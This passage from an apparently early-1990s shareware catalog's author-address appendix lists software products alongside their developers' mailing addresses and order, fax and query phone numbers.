Commercial Software Associates (ComSoft) + Address: P.O. Box 36 Corona del Mar, CA 92625 + Queries: 714-720-1214 + + Product: PopDBF + Bowen Software + Address: P O Box 2134, 126 Devron Circle, East Peoria IL 61611 + Orders: 800-242-4775 + Queries: 309-699-0950 + + Product: AMORTZ + Oregon Software Group + Address: 9865 SW Eagle Lane, Beaverton, OR 97005-6603 + Orders: 503-643-0915 + Fax: 503-650-0082 + Queries: 503-643-0915 + + Product: RIE - Rimrock Icon Editor + Rimrock Software + Address: P.O. Box 2406 Hayden, ID 83835-2406 + Orders: 208-772-9347 + Queries: 208-772-9347 + + Product: InstaCalc + FormalSoft + Address: PO Box 1913, Sandy, Utah 84091 + Orders: 800-962-7118 + Queries: 801-565-0971 + + Product: EXTENDED BATCH LANGUAGE-PLUS! + Seaware Corp. + Address: P.O. Box 1656, Delray Beach, FL 33444 + Orders: 800-634-8188 + Fax: 407-738-1712 + Queries: 407-738-1712 + + Appendix A, "Author addresses" 404 + + + + Product: PCM100.COM + Yves Charier + Address: 64 Rue de Charenton, 75012 Paris, FRANCE + Orders: 331-4340-3743 + Queries: 331-4340-3743 + + Product: Plain Vanilla Labels, Rosewood Journal + Rosewood Software + Address: 135-10 Livonia Place, Scarborough, Ontario M1E 4W6 + Orders: 416-284-6119 + Queries: 416-284-6119 + + Product: VINO:FILE Cellar Master + Mark Christian + Address: 7 Campbell Grove, East Hawthorn, 3123, Victoria, + AUSTRALIA. + Orders: 011-61-3-882-3108 + Fax: 011-61-3-882-3108 + Queries: 011-61-3-882-3108 + + Product: ActaeOn + Jon Clempner + Address: 20, Norleigh Road, Northenden, Manchester, M22 4AZ, + ENGLAND + Orders: +44-61 998 8592 + + Product: EZ-Reader, EZ-Reader + Thumper Technologies + Address: P.O. Box 471346 + Orders: 918-355-3374 + Queries: 918-355-3374 + + Product: Capital Gainz + DBLinx + Address: P.O. Box 12545, RTP, NC, 27709-2545 + Orders: 919-469-5196 + Queries: 919-469-5196 + + Product: Chris's Automobile Recorder + Cooney Applied Technology + Address: P.O. Box 2039, Kettering, OH 45429-0039 + + Product: PATIENCE 10 + CoCoWare - Cowles Company Software + Address: P.O. Box 122721, Fort Worth, TX, 76121-2721 + Queries: 817-249-0821 + + Product: Hearts, PCForm, Q4Tool + CareWare + Address: 10217 Ridge View Dr., Grass Valley, CA 95945 + Orders: 916-477-6024 + Queries: 916-477-6024 + + Appendix A, "Author addresses" 405 + + + + Product: VERSAMAP + Charles H. Culberson + Address: 8 Ritter Lane, Newark, DE 19711 + Orders: 302-731-0694 + Queries: 302-731-0694 + + Product: T-Zero + Dennis Cunningham + rd + Address: No. 405, 25-6 NW 23 Pl., Portland, OR 97210-3534 + + Product: Peronal Record Keeper + Professional Automated Systems + Address: P.O. Box 129, Roosevelt, NJ 08555-0129 + Orders: 609-448-9299 + Queries: 609-448-9299 + + Product: LOTTO PROPHET + DataMicro, Inc + Address: PO Box 3527, Port Charlotte, FL 33949 + Orders: 800-336-7720 + Fax: 813-624-2191 + Queries: 813-629-7720 + + Product: WorkQueue + Lane Davis + Address: P.O.Box 1472, Laurel Springs, NJ 08021 + + Product: FileFinder, Shez + California Software Design + Address: P.O. Box 15284, Santa Rosa, CA 95402 + Orders: 707-575-9868 + + Product: MenuDIRECT Gold, Point & Shoot Backup/Restore, Point & + Shoot Home Manager + Applied Micro Systems Technology + Address: P.O. Box 1784, Stillwater, OK 74076 + Orders: 405-377-0444 + Queries: 405-377-0444 + + Product: ESF's DeskJet Fonts & Utilities, ESF's European DeskJet + Fonts, ESF's European LaserJet Fonts, ESF's LaserJet Fonts & + Util., TSR Download + Elfring Soft Fonts + Address: PO Box 61, Wasco, IL 60183 + Orders: 708-377-3520 + Fax: 708-377-6402 + Queries: 708-377-3520 + + Appendix A, "Author addresses" 406 + + + + Product: Bannerific, Information Please, KICK, KWIKSTAT, + KWIKWRITE, Loan Amortization, PC-CAI, Spell Games + TexaSoft + Address: P.O. Box 1169, Cedar Hill, TX 75104 + Orders: 800-955-TEXAS + Fax: 214-291-3400 + Queries: 214-291-2115 + + Product: SOFF BALLS + Computater Software + Address: 2809 Lordshire Road, Madison WI 53719 + Orders: 608-271-1586 + Queries: 608-271-1586 + + Product: Q&A Study Aid + Quid Pro Quo Software + Address: P.O. Box 1248, Cedar Rapids, IA 52406-1248 + + Product: PBMouse, PBWindows + Barry Erick + Address: 28 Ridge St ; Dallas, PA 18612 + Queries: 717-675-3432 + + Product: AntiC, ATC: Air Traffic Controller, Border, Capbuf, + CHRONOS, Ecomaster, Fictionary, GREEN, PEG, Quilt, UDECIDE, + WEBS + Cascoly Software + th + Address: 4528 36 Ave NE, Seattle, WA 98105 + Orders: 206-523-6135 + Queries: 206-523-6135 + + Product: Easy Format, Lite Format, Prgmr's Productivity Pack + Lite, Programmer's Productivity Pack + Falk Data Systems + Address: 5322 Rockwood Court, El Paso, TX 79932-2412 + Orders: 915-584-7670 + Fax: 915-584-1540 + Queries: 915-584-7670 + + Product: WordMaster + MasterWorks + Address: P.O. Box 116, McCleary WA 98557 + Queries: 206-495-4574 + + Product: Early Bird + Allan Computer Products + Address: PO Box 2177, Shawnee Mission, KS 66201 USA + Orders: 800-374-5725 + Fax: 913-384-3451 + Queries: 913-384-5725 + + Appendix A, "Author addresses" 407 + + + + Product: ALBUM KEEPER II, FASTMAIL, VIDEO BUFF + CACHE MICROSYSTEMS + Address: 2234 Santa Ynez Ave, San Luis Obispo CA 93405-2144 + Queries: 805-549-0532 + + Product: EGA Mouse Paint, HouseHold TRACKER, Melissa's Music + Flashcards, Personal Time Card + Fischer Grafix & Software + Address: P.O. Box 606, Midway City, CA 92655 + Orders: 714-898-7262 + Fax: 714-898-7262 + + Product: ACCU BBS Lister, ACCU Music Printer + Kevin Fischer + Address: 16878 Saint James Drive, Poway, CA 92064-1137 + Orders: 619-487-5461 + Queries: 619-487-5461 + + Product: The Address Book Solution + GSF Software & Solutions + Address: 3380 Sheridan Drive, Suite 391, Amherst NY 14226 + Queries: 716-283-3804 + + Product: QFiler, QFont + Jamestown Software + Address: 2508 Valley Forge Drive, Madison WI 53719 + Orders: 608-271-2090 + Queries: 608-271-2090 + + Product: DIREDIT, HDTEST + Computer Counselors, Inc. + Address: 1515 West Montgomery Avenue, Rosemont, PA 19010 + Queries: 215-527-4408 + + Product: PC-GLOSSARY + Disston Ridge, Inc. + nd + Address: 4915 22 Avenue North + Orders: 800-788-0787 + Fax: 813-327-0822 + Queries: 813-323-0961 + + Product: MAXI Form, NPS - Nominal Pipe Size, Over_LAZ, Over_LAZ + PS, Utility_Belt + Herne Data Systems Ltd + Address: PO Box 250, Tiverton, ON CANADA N0G 2T0 + Orders: 519-366-2732 + Fax: 519-366-2732 + Queries: 519-366-2732 + + Appendix A, "Author addresses" 408 + + + + Product: BlackJack!, Get Lucky! + Glencoe Computing + Address: 1100 Highway C, Glencoe MO 63038-1404 + Orders: 314-458-2863 (EVE) + Queries: 314-458-2863 (EVE) + + Product: HUGO II, WHODUNIT?, HUGO'S HOUSE OF HORRORS, PRO-CR, + TOUCH TYPE TUTOR + Gray Design Associates + Address: PO Box 333, Northboro MA 01532 + Orders: 800-2424-PSL + Fax: 713-524-6398 + + Product: FileXref, ReNamer + ConVal Software, Inc. + Address: 11607 E. Butter Creek Rd., Moorpark, CA 93021 + Orders: 805-529-6847 + Queries: 805-529-6847 + + Product: Flu_Shot+ + Software Concepts Design + Address: 594 Third Avenue, New York, New York 10016 + Orders: 212-889-6431 + Fax: 212-889-9730 + Queries: 212-889-6431 + + Product: ENVI-MAN, FILE-MAN, LASR-MAN, MENU-MAN, PATH-MAN + Micrometric + Address: 98 Dade Avenue + Orders: 813-377-2515 + Fax: 813-377-2515 + Queries: 813-377-2515 + + Product: MenuEase + Creative Computer + Address: 8868 Continental Dr. + Orders: 714-687-2421 + Fax: N.A. + Queries: 714-687-2421 + + Product: ActCalendar, ActMenu, AxTrons, Circle Link, CleanUp, + DirBack, DressMeUp, Dueling Dragons, Gopher's Garden, HowTwo, + MaxMan, OutFox, Pallanda, RoDrones, Spider Web, Spin Wall, + Strudle, Super StarTrek, TiltMaze, TriAxis, Vortex + ShareGames + Address: 3174 Hawthorn St, San Diego, CA 92104 + Orders: 619-283-0472 + Queries: 619-283-0472 + + Product: Directory Freedom, the last word + Bit Masons Consulting + Address: 3205 Windsor Ridge Dr., Westboro MA 01581 + Orders: 508-898-3321 + Queries: 508-898-3321 + + Appendix A, "Author addresses" 409 + + + + Product: PowerBatch Compiler + CSD, Inc. + Address: P.O. Box 566484 Atlanta, GA 30356-6009 + Orders: 404-740-9583 + Fax: 404-664-0872 + Queries: 404-740-9583 + + Product: Ample Notice, LQ + Granny's Old-Fashioned Software + Address: Route 4, Box 216, Boone, NC 28607 USA + Orders: 704-264-6906 + Fax: 704-264-4634 + Queries: 704-264-6906 + + Product: HDM IV - Hard Disk Menu + MicroFox Company + Address: 3310 Fox Run, P.O. Box 447, Richfield OH + 44286-0447 USA + Orders: 216-659-9489 + Queries: 216-659-9489 + + Product: Calendar Mate + Hawk Software + Address: PO Box 3961; Regina, SK S4P 3R9; Canada + Orders: 306-543-8899 + Queries: 306-543-8899 + + Product: SLIM + Dominic Herity + Address: PO Box 3038, Dublin 4, Ireland. + + Product: WinPost + Eastern Mountain Software + Address: P.O. Box 20178, Columbus, Ohio 43220 + Queries: 614-798-0910 + + Product: "Cheque-It-Out", Takin' Care of Business! AP, Takin' + Care of Business! AR, Takin' Care of Business! GL, Takin' Care + of Business! IN, Takin' Care of Business! M&C, Takin' Care of + Business! PR, Takin' Care of Business! PS + Hooper International, Inc. + Address: P.O. Box 50200 Colorado Springs, CO 80949 + Orders: 800-245-7789 + Fax: 719-528-8997 + Queries: 719-528-8989 + + Product: PullDown SAA Menu Shell + MicroDynamics Development + Address: 1445 Mensch Lane, Gilbertsville, PA 19525 + Orders: 800-2424-PSL + Queries: 215-367-1891 + + Appendix A, "Author addresses" 410 + + + + Product: ORGANIZE! Jazz Collection, ORGANIZE! Memorabilia, + ORGANIZE! Professional Books, ORGANIZE! Your Art, ORGANIZE! + Your Books/Magazines, ORGANIZE! Your CDs & Records, ORGANIZE! + Your Coin Collection, ORGANIZE! Your Comic Books, ORGANIZE! + Your Fabrics, ORGANIZE! Your Guns, ORGANIZE! Your Home, + ORGANIZE! Your Model Railroad, ORGANIZE! Your Plants/Garden, + ORGANIZE! Your Sports Cards, ORGANIZE! Your Stamp Collection, + ORGANIZE! Your Video Tapes, Play 'n' Learn + HomeCraft Software + Address: P.O. Box 974, Tualatin, OR 97062 + Orders: 503-692-3732 + Fax: 503-692-0382 + Queries: 503-692-3732 + + Product: Total Investor for 1-2-3, Total Investor for Symphony + Hughes Financial Services + Address: P.O. Box 1244, Nashua, N.H. 03061-1244 + Orders: 603-598-4676 + Fax: 603-598-4676 + Queries: 603-598-4676 + + Product: HyperSlide, PlotManager, SlideManager + John Intorcio + Address: 335 Washington Street, Suite 178, Woburn, MA 01880 + Orders: 617-246-9640 + Queries: 617-246-9640 + + Product: VIDEOCAT + William A. Jackson + Address: 6529 Matilija Avenue, Van Nuys, CA 91401 + + Product: TimeStax + Johnson Technologies + Address: 10564 N. Blaney Avenue, Cupertino, CA. 95014 + Orders: 408-255-4213 + Fax: 408-253-9994 + Queries: 408-255-4213 + + Product: DAYO ACCOUNTS PAYABLE (AP), DAYO ACCOUNTS RECEIVABLE + (AR), DAYO BACK ORDERS (BO), DAYO BAR CODE 3 OF 9, DAYO BILLING + & INVOICING, DAYO END OF PERIOD, DAYO GENERAL LEDGER (GL), DAYO + INDEX, DAYO INVENTORY, DAYO LITTLE POS, DAYO LOOKUP, DAYO + MEMBERSHIP, DAYO MENU, DAYO MRP, DAYO ORDER ENTRY, DAYO + PASSWORDS, DAYO PAYROLL, DAYO POS (POINT OF SALE), DAYO PRICE + BOOK, DAYO QUOTES, DAYO RENTAL POS, DAYO RETURN MANAGEMENT + SYSTEM, DAYO RETURNS & REFUNDS, DAYO SIMPLE POS, DAYO SMART + REPORTS, DAYO TIME & BILLING + TJS LAB, Inc. + Address: 5104 N. Orange Blossom Trail, #200, Orlando, FL 32810 + Orders: 407-292-4708 + Fax: 407-295-1704 + Queries: 407-291-3960 + + Appendix A, "Author addresses" 411 + + + + Product: Recursive Realm + Austin Software Design + Address: P.O. Box 30133, Grand Junction, CO 81503 + Orders: 303-242-7606 + Queries: 303-242-7606 + + Product: Crossword Clipper for Windows, Crossword Creator + PC HELP-LINE + Address: 35250 Silver Leaf Circle, Yucaipa, CA 92399, United + States + Orders: 714-797-3091 + Queries: 714-797-3091 + + Product: ALITE, AS-EASY-AS, DRAFT CHOICE + TRIUS, Inc. + Address: P.O. BOX 249, N. Andover, MA 01845-0249 + Orders: 800-GO TRIUS + Fax: 508-688-6381 + Queries: 508-794-9377 + + Product: LAN-LINK, PC-HAM, STARTREK the Computer Program, WHATS- + UP + Software for Amateur Radio + Address: POB 3419, Silver spring, MD, 20918 + Queries: 301-593 6136 + + Product: SNAP! + Walter J. Kennamer + Address: 7027 Dunstans Lane + + Product: TreeTop + Kilgore Software + Address: P.O. Box 2291, West Sacramento, CA 95691 + Orders: 800-TREETOP + Queries: 916-371-3715 + + Product: FPLAN-Captital Needs Planner, FPLAN-Education Funding + Planner, FPLAN-Income Protection Planner, FPLAN-Personal + Financial Plnr, FPLAN-Retirement Planner + First Financial Software + Address: P.O. Box 592967, Orlando, FL 32859-2967 + Orders: 800-736-4920 + Queries: 407-352-2529 + + Product: 4Print, Babble! + Korenthal Associates, Inc. + Address: 230 West 13th Street, New York, NY 10011 + Orders: 800-KA-PROGS + Fax: 212-242-2599 + Queries: 212-242-1790 + + Appendix A, "Author addresses" 412 + + + + Product: Calendar Keeper + Dataphile Software + Address: 7058 Sandpiper, Kalamazoo, MI, 49002 + Orders: 616-327-7811 + Queries: 616-327-7811 + + Product: AFFORD IT??? + Garrett Krueger Software Development + Address: P.O. Box 17037, St. Paul, MN 55117 + Orders: 612-776-9942 + Queries: 612-776-9942 + + Product: The Pool Manager + American Systems + Address: Post Office Box 604, LaGrange, IL 60525-0604 + + Product: C.A.R.S., JDIR, Print-it + Cybernetic Software + Address: P. O. Box 3594, Skokie IL 60076 + Orders: 708-677-8358 + Fax: 708-677-8358 + Queries: 708-677-8358 + + Product: Lotto Challenger + Data Solutions + Address: 1529 Thistledown Drive, Brandon, FL 33510 + Orders: 800-783-8934 + Queries: 800-783-8934 + + Product: DosEA 1--For Absolute Beginners, DosEA 2--What is DOS?, + DosEA 3--10 Easy Commands, DosEA 4--Find That Command!, DosEA + 5--All About MS-DOS 5.0, DosEA 6--Switched on DOS, Hangman for + Students, Nine Men's Morris, Tear Down the Wall, The World's + Simplest Computer + Langin Software + rd + Address: 532 W. 3 St., Centralia, IL 62801 + Orders: 618-532-4899 + Fax: 618-532-0075 + Queries: 618-532-4899 + + Product: LCD: Led's Change Directory, SST: the Supersonic Search + Tool + Keith Ledbetter + Address: 4240 Ketcham Drive Chesterfield, VA 23832 + Queries: 804-674-0780 + + Product: Oak Hill Vi(tm) + Oak Hill Software, Inc. + Address: 73 Hillyer Circle, Middletown, NJ 07748 USA + Orders: 908-671-8544 + Queries: 908-671-8544 + + Appendix A, "Author addresses" 413 + + + + Product: Multi-level Pull-down Menus, Multi-level Pull-down + Menus, Multi-level virtual windows, Multi-level Virtual + Windows, QWIK Screen Utilities, QWIK Screen Utilities for C, + STRG String Processing Routines + Eagle Performance Software + Address: P.O. Box 292786 + Orders: 214-539-7855 + Fax: 817-457-2429 + Queries: 214-539-7855 + + Product: Dinger, Enveloper, WOPR-WinWord Office POWER Pack + Pinecliffe International + Address: Post Office Drawer 7337 - Coal Creek Canyon - Golden + CO 80403 + Orders: 800-OK-WINWORD + Queries: 303-642-0604 + + Product: CtrlcLib, PC-FasType/CGA, PC-FasType/MONO + Trendtech Corporation + Address: P.O. Box 3687, Wayne, NJ 07474-3687 U.S.A. + Orders: 201-694-8622 + Fax: 201-694-2543 + Queries: 201-694-8622 + + Product: Balloons, DrawSome + AssistWare + Address: 1505 Sedwick Rd., Durham, NC 27713 + Orders: 919-544-5567 + Queries: 919-544-5567 + + Product: STS26, World Name Game, WORLD29 + Robert L. Lloyd + Address: 191 Via De La Reina, Merritt Island, FL 32953 + + Product: LiteComm(tm) for Microsoft C, LiteComm(tm) for Turbo C, + LiteSPM + Information Technology, Ltd. + Address: 5 Park Blvd., Lincoln, RI 02865 + Queries: 401-724-2730 + + Appendix A, "Author addresses" 414 + + + + Product: An Ounce Of Prevention + Pete Maclean Software + Address: P. O. Box 591359, San Francisco, CA 94159-1359 + Fax: 415-751-4635 + + Product: PMZIP, WinZip + Nico Mak + Address: P.O. Box 919, Bristol, CT 06011-0919 + Orders: 800-242-4775 + + Product: MegaHost + ASCII Computer Enterprises + Address: 231 Market Place #353, San Ramon, CA 94583 + Orders: 800-242-4775 #10391 + + Product: FIELD GENERAL + rbm software + Address: 13117 Broughton Way, Austin, TX 78727-3147 + Queries: 512-388-0830 + + Product: PC-DEAL + KINDRED SPIRITS + Address: 1407 Finntown Road, Waldoboro, Maine 04572 + Orders: 800-2424-PSL + Fax: 713-524-6394 + + Product: EM Klondike, EM Poker Solitaire, EM Pyramid + EM Software + Address: Station A, P.O. Box 2052 Champaign, IL 61825-2052 + Fax: 217-367-9346 + + Product: COM-AND + CABER Software + Address: P.O. Box 3607 MDSE MART, Chicago IL 60657-0607 + Orders: 310-439-6104 + Fax: 312-477-0925 + Queries: 310-439-6104 + + Product: DMP + DMP Software + nd + Address: 204 E. 2 Ave., Suite 610, San Mateo, CA 94401 + Fax: 415-341-2702 + Queries: 415-341-2702 + + Product: The Retailer + RetailWare + Address: 2107 West Britton Road, Oklahoma City, OK 73120-1577 + USA + Orders: 405-749-1763 + Fax: 405-751-5629 + Queries: 405-749-1763 + + Appendix A, "Author addresses" 415 + + + + Product: PC-AP Accounts Payable, PC-AR Accounts Receivable, PC-GL + General Ledger, PC-PR Payroll Writing, PCINV Invoice Writing + Medlin Accounting Shareware + Address: 1461 Sproul Avenue, Napa, CA 94559 + Orders: 707-255-4475 + Fax: 707-255-9266 + Queries: 707-255-4475 + + Product: SR-Info + Sub Rosa Publishing Inc. + Address: 1170 Sheppard Ave. W., Unit 34, Downsview, ON M3K 2A3 + Orders: 416-398-8414 + Fax: 416-398-8415 + Queries: 416-398-8414 + + Product: PCBUDGET + ProLogic Software + Address: P.O. Box 71 - Loveland, Ohio 45140 + Orders: 513-677-1754 + Queries: 513-677-1754 + + Product: Systems Manager + MiCord + Address: P.O. Box 1344, Midland, MI 48640 + Orders: 517-631-4367 + Queries: 517-631-4367 + + Product: FBNCAT, OffLoad + FBN Software + Address: P.O. Box 160867, Cupertino CA 95016 + Queries: 408-446-9039 + + Product: JEPRS (Jeepers!) + Louis M. Miranda + Address: P.O. Box 822894, Dallas, TX 75382 + Queries: 214-522-5110 + + Product: QEdit(R) Advanced + SemWare + Address: 4343 Shallowford Rd, Suite C3A, Marietta, GA + 30062-5022 + Orders: 404-641-9002 + Fax: 404-640-6213 + Queries: 404-641-9002 + + Product: PC-STRAN(tm), PCBRIDGE(tm) + Joe Murphy + Address: P.O. Box 56164, Madison, WI 53705-9464 + Queries: 608-274-1946 + + Appendix A, "Author addresses" 416 + + + + Product: Find Area Code (FAC) + Mountain Data Systems + Address: 8531 East Dry Creek Place, Englewood, CO 80112-2701 + Orders: 303-773-9515 + Queries: 303-773-9515 + + Product: The Window BOSS & Data Clerk + Star Guidance Consulting, Inc. + Address: 273 Windy Drive, Waterbury, CN 06705 + Orders: 203-574-2449 + Fax: 203-755-8842 + Queries: 203-574-2449 + + Product: DIRECT MAINT, FILE PATCH, MORFORM, MORSOFT CALCULATOR, + PC SYSTEM MANAGER + MORSOFT + Address: 9859 IH-10 West, 107/811 + Orders: 800-662-0028 + Queries: 512-561-0731 + + Product: dBF-View, STAFF-BASE, STAFF-DBMS-PRODUCT-FAMILY, STAFF- + DEVELOPER, STAFF-DIAL, STAFF-GRAF, STAFF-INTEGRATOR, STAFF- + KICK, STAFF-MASK, STAFF-REPORT, STAFF-UTIL + MSC - Morariu Software Consulting + Address: Im Mainfeld 23, D-6000 Frankfurt/M 71, Germany + Orders: 0049-69-6702652 + Fax: 0049-69-676017 + Queries: 0049-6196-48524 + + Product: Disk OrGanizer (DOG) + Soft GAM's Software + Address: P. O. Box 1311, Mendocino, CA 95460-1311 + Queries: 707-961-1632 + + Product: JetPilot LaserJet Control, ZapCode Pro Printer Control + Morton Utilities + Address: 81-887 Tournament Way, Indio, California 92201, U.S.A. + Orders: 619-347-7563 + Queries: 619-347-7563 + + Product: The Children's Graphics Program, Dad's Choice, Dr. + Motes' Colorbook, Mom's Math, School-Mom + Motes Educational Software + Address: 1632 Brooks St., Fayetteville, AR 72701 + Orders: 501-442-5652 + Queries: 501-442-5652 + + Appendix A, "Author addresses" 417 + + + + Product: DasBOOT!, EGAWHEEL, VGAWHEEL, WINWHEEL + WHEEL Games + Address: 507 Washington Gdns, Washington, NJ 07882-9205 + + Product: pEDIT PLUS + T. G. Muench + Address: P.O. Box 11536, Prescott, AZ 86304-1536 + Queries: 602-445-2479 + + Product: Badge-O-Magic, dLITE, WAMPUM, Zephyr + Ward Mundy Software + Address: 4160 Club Drive, Atlanta, GA 30319 + Orders: 404-237-9420 + Fax: 404-237-1167 + Queries: 404-237-9420 + + Product: MakeDemo + WindhamWoods Publishing + Address: P. O. Box 314, Windham, NH 03087 U. S. A. + Orders: 800.487.2667 + Queries: 603.893.2667 + + Product: SeedMaster + White Harvest Software, Inc. + Address: P.O. Box 97153 + Orders: 919-870-0775 + Queries: 919-870-0775 + + Product: Magic Brush & Magic Show, What's Up(tm) + Nassib Nassar + Address: 4035 Livingstone Pl., Durham, NC 27707 + + Product: Cash Control + Adrian-Thomas Developments, Inc. + Address: P.O Box 532, Orleans, Ontario, Canada, K1C 1S9 + Orders: 613-837-0684 + Queries: 613-837-0684 + + Product: PathProj, RXridge, RXtraces + softRX shareware + Address: 5261 Woodfield Drive North; Carmel, IN 46032-8795 + + Product: Bass Class, BassTour, Tikler + Olsen Outdoors + Address: 68 Hartwell Avenue, Littleton, MA 01460 + Queries: 508-486-3042 + + Product: DMPLAS (Dot Matrix to LaserJet), Layout + Software Co-op + Address: 5437 Honey Manor Dr Indianapolis IN 46241 + Orders: 317-856-6052 + Queries: 317-856-6052 + + Appendix A, "Author addresses" 418 + + + + Product: Easy Project + Parcell Software + Address: P.O. Box 165 Geneva, Il 60134 U.S.A. + Orders: 708-232-6328 + Fax: 708-232-6339 + Queries: 708-232-6328 + + Product: Easydial, PALERT, PATTR, PCOPY, PDAILY, PDEL, PPRINT, + PSEARCH, PTOUCH, RECALL + Patri-Soft + Address: 2900 Adams St. Suite C-210, Riverside, CA 92504 + Orders: 800-242-4775 + Fax: 714-352-1527 + Queries: 714-352-2820 + + Product: BatchMaker Plus, CNC-Transedit, Directory-Manifest, + LOANS & SAVINGS, MathAttack, TRIG-IT & GEO-DIM + Northland Multisoft + Address: 1501 S. Glendora Ave. Glendora CA 91740 + Orders: 818-963-6355 + Queries: 818-963-6355 + + Product: AMORTIZATION TABLE, ELECTRON, FAST INVOICE WRITER, FAST + STATEMENT WRITER, MULTIFILE-XL, PAYMENT BOOK WRITER + H&P Software + Address: 218 Newman Avenue, Pueblo, CO 81005 + Orders: 719-561-0810 + Queries: 719-561-0810 + + Product: Painless Accounting, Painless Acct/Payroll Companion, + Painless Event Processor, Painless Menu Manager, Painless + Payroll + Painless Accounting + Address: 4401 Birdsong Plano, TX 75093 + Orders: 800-521-9905 + Fax: 214-596-9164 + Queries: 800-521-9905 + + Product: Simply Help!, Simply Labels + SimpleWare + Address: P.O. Box 877 Windsor, NF Canada A0H 2H0 + Queries: 709-489-3757 + + Product: Charge Account Management Prog., Checkbook Management + Program, Savings Account Management Prg. + M. P. Data + Address: 113 Foxport Dr., Kingsport, TN 37664-5626 + Queries: 615-349-7744 + + Appendix A, "Author addresses" 419 + + + + Product: ORGANIZE + David H. Pritchett + Address: P.O. Box 7273 Macon, GA 31209-7273 + + Product: SWAPDOS, SWAPDS, SWAPLM, SWAPMM, SWAPNG, SWAPSK, SWAPTN, + TCXL User Interface Development, TesSeRact Compression System, + TesSeRact File Management, TesSeRact Printer Control, TesSeRact + Screen Designer, TesSeRact TSR Devel. System + Innovative Data Concepts, Inc. + Address: 122 North York Road, Suite 5, Hatboro. PA 19040 + Orders: 215-443-9705 + Fax: 215-443-9753 + Queries: 215-443-9705 + + Product: InContext + Rams' Island Software + Address: 7644 Lakecliff, Parker, CO 80134-5904 + Orders: 303-841-2848 + Queries: 303-841-2848 + + Product: XRS ("eXpress Response System") + Smokin' Software + Address: 995 Buck Hall Landing, McClellanville, S.C. 29458 + Orders: 803-928-3332 + Queries: 803-928-3332 + + Product: PrintCAD, PrintGL, Ravitz Editor + Ravitz Software Inc. + Address: P.O. Box 25068 / Lexington, KY 40524-5068 / USA + Queries: 606-268-4223 + + Product: 4DOS + JP Software Inc. + Address: P.O. Box 1470, East Arlington, MA 02174, USA + Orders: 800-368-8777 + Fax: 617-646-0904 + Queries: 617-646-3975 + + Product: VAR Grade + VARed Software + Address: 1490 Calle Fidelidad Thousand Oaks, CA 91360-6819 + Orders: 800-2424-PSL + Queries: 805-523-7546 + + Product: BridgePal, Names & Dates, PC-Names + WR Software + Address: PO Box 4819 + Orders: 415-930-0369 + Queries: 415-930-0369 + + Appendix A, "Author addresses" 420 + + + + Product: HyperPAD, Show Partner Lite + Brightbill-Roberts and Company, Ltd. + Address: 421 University Building, Syracuse NY 13202 + Orders: 800-444-3490 + Fax: 315-472-1732 + Queries: 800-444-3490 + + Product: Convert To Structured BASIC, Mille French Card Game, + PBfmt, Total Control, Your Numerologist + Unique Software + Address: P.O. Box 26613, Ft. Worth, TX 76126-0613 + Fax: 817-249-4284 + + Product: ALPHAQUOTE, CODE TO CODE + AlphaBytes, Inc. + th + Address: 111 8 St., S.E., Washington, DC 20003 + Orders: 202-546-4119 + Fax: 202-547-5133 + Queries: 202-546-4119 + + Product: BLANK-IT, TrikTrak + Rhode Island Soft Systems, Inc. + Address: P.O. Box 748, Woonsocket, RI 02895 + Orders: 401-658-4632 + Fax: 401-658-4632 + Queries: 401-658-4632 + + Product: Brandon's Bigbox, Hotnet + Robichaux and Associates + Address: P. O. Box 82311 + Orders: 504-752-2620 + Queries: 504-752-2620 + + Product: PC-INFO + Cheat River Engineering + Address: 23 Richwood Place / P. O. Box 289 / Denville, NJ + 07834-0289 + Orders: 201-627-5460 + Queries: 201-627-5460 + + Product: NAMEGRAM, PIANOMAN + Neil J. Rubenking + Address: 86 Midcrest Way, San Francisco, CA 94131 + Orders: 800-USA-GROU + + Product: Technical Editor + Superior Soft + Address: P.O. Box 17355, Irvine, CA 92714 + + Product: pE - The "perfect" Editor(tm) + Just Excellent Software, Inc. + Address: P.O. Box 1996, Media, PA 19063 + Queries: 215-565-7780 + + Appendix A, "Author addresses" 421 + + + + Product: BOOT.SYS + Hans Salvisberg + Address: Bellevuestr. 18, CH-3095 Berne, SWITZERLAND + + Product: DISK SPOOL II + Budget Software Company + Address: P.O. Box 12282; Aurora, CO 80012 + Orders: 303-695 9095 + Queries: 303-695 9095 + + Product: LQMATRIX, MEMORY + Jimmy Paris Software + Address: 906 Old Farm Rd., Charlottesville, VA 22903 + Queries: 804-295-5496 + + Product: AlbumMaster, CassetteMaster, CDMaster, CompUser, + DayMaster, DiZk4D, DiZkND, LessonPlanZ, OMNIDay, OMNIDiZk, + OMNIMeal, PostCardMaster, SoundZ, VideoMaster, WordZ + Unicorn Software Limited + Address: P.O. Box 911 Wabash, IN 46992-0911 + Orders: 800-2424-PSL + Queries: 219-563-HOME + + Product: PC Canary, TimeTrac + Compass / New England + Address: POBox 117, Portsmouth, NH 03802-0117 + Orders: 603-431 8030 + Queries: 603-431 8030 + + Product: Time is Money + Custom Data Solutions + Address: 248 Wood Lake Drive, Maitland, FL 32751 + Orders: 407-767-9278 + Fax: 407-767-9712 + + Product: DialThat, LaserForm, Mercury + Real Software + Address: PO Box 1680, Soquel, CA, 95073 USA + Orders: 408-476-3550 + Fax: 408-476-3550 + Queries: 408-476-3550 + + Product: PC-FOOD + Schreck Software + Address: 1420 Interlachen Circle, Woodbury, MN 55125 + Orders: 612-731-6822 + Queries: 612-731-6822 + + Appendix A, "Author addresses" 422 + + + + Product: BESTTEST + WiseWare + Address: P.O. Box 148130 Chicago, IL 60614 + + Product: BakupWiz + PCX + Address: 4874 Alberson Court, Suite 110, Carmel Valley, CA + 92130 + Orders: 619-259-9797 + Fax: 619-481-6474 + Queries: 619-259-9797 + + Product: EDDY (EDit DirectorY) + John Scofield + Address: 22304 Gilmore St., Canoga Park, CA 91303 + + Product: BATUTIL, STACKEY + CTRLALT Associates + Address: Suite 133, 260 South Lake Ave., Pasadena, CA 91101 + Orders: 800-872-4768 + + Product: DOS Summary, DOS Summary (Hypertext), TUTOR.COM + Computer Knowledge + Address: PO Box 91176, Los Angeles, CA 90009-1176 + + Product: HiMOVE + C.Sitte Softwaretechnik + Address: Postfach 42, A-5025 Salzburg, AUSTRIA + + Product: Recon(tm) + Amdox Co. Ltd. + Address: 217 Terrace Hill Street, Brantford, Ontario, Canada + N3R 1G8 + Orders: 519-752-5453 + + Product: PAK + NoGate Consulting + Address: PO Box 88115 Grand Rapids MI 49518-0115 + Orders: 616-530-9950 + Fax: 616-530-2676 + Queries: 616-530-9950 + + Product: Btr Help!, Btr Watch, Mass-Store Copy, Volcano Hunter + Informative Technologies + Address: 1718 M Street NW, Suite 292, Washington, DC, + 20036-4504 + Orders: 